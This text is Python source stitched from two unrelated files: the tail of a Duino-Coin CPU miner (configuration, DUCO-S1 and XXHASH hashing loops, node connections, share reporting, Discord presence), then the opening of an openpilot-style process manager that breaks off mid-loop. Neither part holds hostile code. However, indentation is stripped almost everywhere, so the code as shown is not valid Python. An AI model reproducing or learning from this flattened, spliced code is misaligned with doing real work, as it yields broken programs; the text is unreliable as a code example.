        # Check whether algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
        # Check whether diff setting is correct
if requested_diff == "1":
requested_diff = "LOW"
elif requested_diff == "2":
requested_diff = "MEDIUM"
else:
requested_diff = "MEDIUM"
        # Check whether donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == "":
donation_level = 1
elif float(donation_level) > int(5):
donation_level = 5
elif float(donation_level) < int(0):
donation_level = 0
# Format data
config["Duino-Coin-PC-Miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": 45,
"periodic_report": 60,
"discord_presence": "y"
}
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["Duino-Coin-PC-Miner"]["username"]
efficiency = config["Duino-Coin-PC-Miner"]["efficiency"]
threadcount = config["Duino-Coin-PC-Miner"]["threads"]
requested_diff = config["Duino-Coin-PC-Miner"]["requested_diff"]
donation_level = config["Duino-Coin-PC-Miner"]["donate"]
algorithm = config["Duino-Coin-PC-Miner"]["algorithm"]
rig_identiier = config["Duino-Coin-PC-Miner"]["identifier"]
debug = config["Duino-Coin-PC-Miner"]["debug"]
SOC_TIMEOUT = int(config["Duino-Coin-PC-Miner"]["soc_timeout"])
discord_presence = config["Duino-Coin-PC-Miner"]["discord_presence"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-PC-Miner"]["periodic_report"])
efficiency = (100 - float(efficiency)) * 0.01
def ducos1(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
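    # Hash the block-hash prefix once, then copy() the state for each nonce instead of re-hashing the prefix every iteration.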
    # Loop from 0 to 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1res % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# XXHASH algorithm
# Measure starting time
timeStart = time()
    # Loop from 0 to 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1xxres % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid: int,
accepted: int,
rejected: int,
requested_diff: str,
khashcount: int,
username: str,
efficiency: int,
rig_identiier: str,
algorithm: str,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS: str,
NODE_PORT: int):
# Mining section for every thread
start_time = time()
report_shares = 0
while True:
while True:
try:
retry_counter = 0
while True:
try:
if retry_counter >= 3:
debug_output(
'Error connecting after 3 retries, '
+ 'fetching new node IP')
NODE_ADDRESS, NODE_PORT = fetch_pools()
debug_output('Connecting to node ' +
str(NODE_ADDRESS) + ":" + str(NODE_PORT))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if server_version:
break
except Exception as e:
retry_counter += 1
pretty_print("net0",
" Error connecting to mining node: "
+ str(e)
+ ", retrying in 5s",
"error")
sleep(5)
if threadid == 0:
soc.send(bytes("MOTD", encoding="utf8"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
if threadid == 0:
if float(server_version) <= float(MINER_VER):
# Miner is up-to-date
pretty_print(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(server_version)
+ ", node: "
+ str(NODE_ADDRESS)
+ ":"
+ str(NODE_PORT)
+ ")",
"success")
else:
# Miner is outdated
pretty_print(
"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
sleep(5)
break
except Exception as e:
# Socket connection error
pretty_print(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
pretty_print(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(threadid) +
"Correct job received")
break
except:
pretty_print("cpu" + str(threadid),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff, efficiency)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff, efficiency)
computetimeStop = time()
computetime = computetimeStop - computetimeStart
debug_output("Thread "
+ str(threadid)
+ ": result found: "
+ str(result[0]))
# Convert to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
                    # Calculate total hashrate of all threads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(result[0])
+ ","
+ str(result[1])
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
+ str(rig_identiier),
encoding="utf8"))
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip("\n")
responsetimestop = now()
ping = int((responsetimestop - responsetimetart
).microseconds / 1000)
debug_output("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
elif totalhashrate > 100:
# Format for >100 kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
else:
# Format for small hashrates
formattedhashcount = str(
"%02.1f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 1500
and accepted.value % 50 == 0):
pretty_print("sys0",
" " +
getString("max_hashrate_notice"),
"warning")
diff = get_prefix(diff)
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ⛏"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ⛏"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = accepted.value - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
totalhashrate,
uptime)
start_time = time()
break
break
except Exception as e:
pretty_print(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debug_output("Error while mining: " + str(e))
sleep(5)
break
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" Periodic mining report (BETA): "
+ Fore.RESET
+ Style.NORMAL
+ "\n\t\t‖ During the last "
+ str(seconds)
+ " seconds"
+ "\n\t\t‖ You've mined "
+ str(shares)
+ " shares ("
+ str(round(shares/seconds, 1))
+ " shares/s)"
+ "\n\t\t‖ With the hashrate of "
+ str(int(hashrate)) + " kH/s"
+ "\n\t\t‖ In this time period, you've solved "
+ str(int(hashrate*seconds))
+ " hashes"
+ "\n\t\t‖ Total miner uptime: "
+ str(uptime), "success")
def pretty_print(message_type, message, state):
# Prints colored output messages
# Usb/net/sys background
if message_type.startswith("net"):
background = Back.BLUE
elif message_type.startswith("cpu"):
background = Back.YELLOW
if message_type.startswith("sys"):
background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ message_type
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debug_output("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debug_output("Rich presence updated")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
def get_fastest_connection(server_ip: str):
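    # Open non-blocking connections to every known port, PING the ones that answer, and return the port of the first responder.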
connection_pool = []
available_connections = []
for i in range(len(AVAILABLE_PORTS)):
connection_pool.append(socket())
connection_pool[i].setblocking(0)
try:
connection_pool[i].connect((server_ip,
AVAILABLE_PORTS[i]))
connection_pool[i].settimeout(SOC_TIMEOUT)
except BlockingIOError as e:
pass
ready_connections, _, __ = select.select(connection_pool, [], [])
while True:
for connection in ready_connections:
try:
server_version = connection.recv(5).decode()
except:
continue
            if server_version == '':
continue
available_connections.append(connection)
connection.send(b'PING')
ready_connections, _, __ = select.select(available_connections, [], [])
ready_connections[0].recv(4)
return ready_connections[0].getpeername()[1]
def fetch_pools():
while True:
pretty_print("net0",
" "
+ getString("connection_search")
+ "...",
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool"
).json()
pretty_print("net0",
" Retrieved mining node: "
+ Fore.RESET
+ Style.NORMAL
+ str(response["name"]),
"success")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return NODE_ADDRESS, NODE_PORT
except Exception as e:
pretty_print("net0",
" Error retrieving mining node: "
+ str(e)
+ ", retrying in 15s",
"error")
sleep(15)
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
title(getString("duco_python_miner") + str(MINER_VER) + ")")
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True)
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
pretty_print(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 10s.",
"error")
sleep(10)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debug_output("Config file loaded")
except Exception as e:
pretty_print(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debug_output("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debug_output("Greeting displayed")
except Exception as e:
pretty_print(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debug_output("Error displaying greeting message: " + str(e))
try:
NODE_ADDRESS, NODE_PORT = fetch_pools()
except:
NODE_ADDRESS = "server.duinocoin.com"
NODE_PORT = 2813
debug_output("Using default server port and address")
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS,
NODE_PORT))
thread[x].start()
if x > 4 and x % 4 == 0:
# Don't launch burst of threads
# to not get banned
sleep(5)
else:
sleep(0.1)
except Exception as e:
pretty_print(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debug_output("Error launching CPU thead(s): " + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debug_output("Error launching Discord RPC thead: " + str(e))
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR
from common.hardware import HARDWARE, ANDROID, PC
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1040
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
  # whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
from common.text_window import TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner(noop=(__name__ != "__main__" or not ANDROID))
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
          # Build failed, log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
no_ui = __name__ != "__main__" or not ANDROID
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s, noop=no_ui) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
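# Each entry is either a python module path (run via launcher) or a (directory, argv) tuple for a native binary.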
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if WEBCAM:
car_started_processes += [
'dmonitoringd',
'dmonitoringmodeld',
]
if not PC:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'gpsd',
'rtshield',
]
# starting dmonitoringmodeld when modeld is initializing can sometimes
# result in a weird snpe state where dmon constantly uses more cpu than normal.
car_started_processes += ['modeld']
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
# TODO: Use method from HARDWARE
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
params = Params()
EnableLogger = int(params.get('OpkrEnableLogger'))
if not EnableLogger:
car_started_processes.remove( 'loggerd' )
persistent_processes.remove( 'logmessaged' )
persistent_processes.remove( 'uploader' )
persistent_processes.remove( 'logcatd' )
persistent_processes.remove( 'updated' )
persistent_processes.remove( 'deleter' )
persistent_processes.remove( 'tombstoned' )
else:
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
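  # Main loop: watch thermal messages and start or stop the car-started processes based on the ignition ("started") state.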
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
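    # Stop loggerd when free storage drops below 5%.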
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
